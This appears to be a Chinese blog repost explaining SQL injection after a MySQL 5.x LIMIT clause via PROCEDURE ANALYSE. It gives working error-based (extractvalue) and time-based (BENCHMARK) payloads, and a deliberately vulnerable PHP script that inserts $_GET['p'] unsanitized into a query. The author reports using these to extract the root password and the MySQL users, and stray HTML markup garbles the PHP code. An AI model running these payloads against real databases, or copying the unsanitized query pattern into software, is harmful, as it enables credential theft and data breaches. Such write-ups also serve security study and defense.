mysql下limit注入

7 篇文章 0 订阅
5 篇文章 0 订阅

原文: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ http://zone.wooyun.org/content/18220

此方法适用于MySQL 5.x中,在limit语句后面的注入 

例如: 

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point
```   上面的语句包含了ORDER BYMySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法 ```
SELECT 
    [ALL | DISTINCT | DISTINCTROW ] 
      [HIGH_PRIORITY] 
      [STRAIGHT_JOIN] 
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
    select_expr [, select_expr ...] 
    [FROM table_references 
    [WHERE where_condition] 
    [GROUP BY {col_name | expr | position} 
      [ASC | DESC], ... [WITH ROLLUP]] 
    [HAVING where_condition] 
    [ORDER BY {col_name | expr | position} 
      [ASC | DESC], ...] 
    [LIMIT {[offset,] row_count | row_count OFFSET offset}] 
    [PROCEDURE procedure_name(argument_list)] 
    [INTO OUTFILE 'file_name' export_options 
      | INTO DUMPFILE 'file_name' 
      | INTO var_name [, var_name]] 
    [FOR UPDATE | LOCK IN SHARE MODE]]

在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,那么使用PROCEDURE函数能否注入呢? Let’s give it a try: 

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE可以有两个参数:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1); 

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

看起来并不是很好,继续尝试:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

但是立即返回了一个错误信息: 

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'

sleep函数肯定没有执行,但是最终我还是找到了可以攻击的方式: 

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

如果不支持报错注入的话,还可以基于时间注入:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

直接使用sleep不行,需要用BENCHMARK代替。 

我亲测好用~这里附上我的测试代码:

<?php 
header("Content-Type: text/plain; charset=utf-8");
require("mysql.class.php");
$mysql = new MySQL("test", "root", "root");

$users</span> <span class="o">=</span> <span class="nv">$mysql->executeSQL("SELECT * FROM user where uid < 100 ORDER BY uid limit {$_GET['p']}, 10");
if($users){
$users</span> <span class="o">=</span> <span class="nb">var_export</span><span class="p">(</span><span class="nv">$users, TRUE);
echo $users;
}else{
    echo $mysql->lastError;
}

报错注入获得root密码:

QQ20150124-4@2x.png

报错注入获得mysql用户:

QQ20150124-3@2x.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值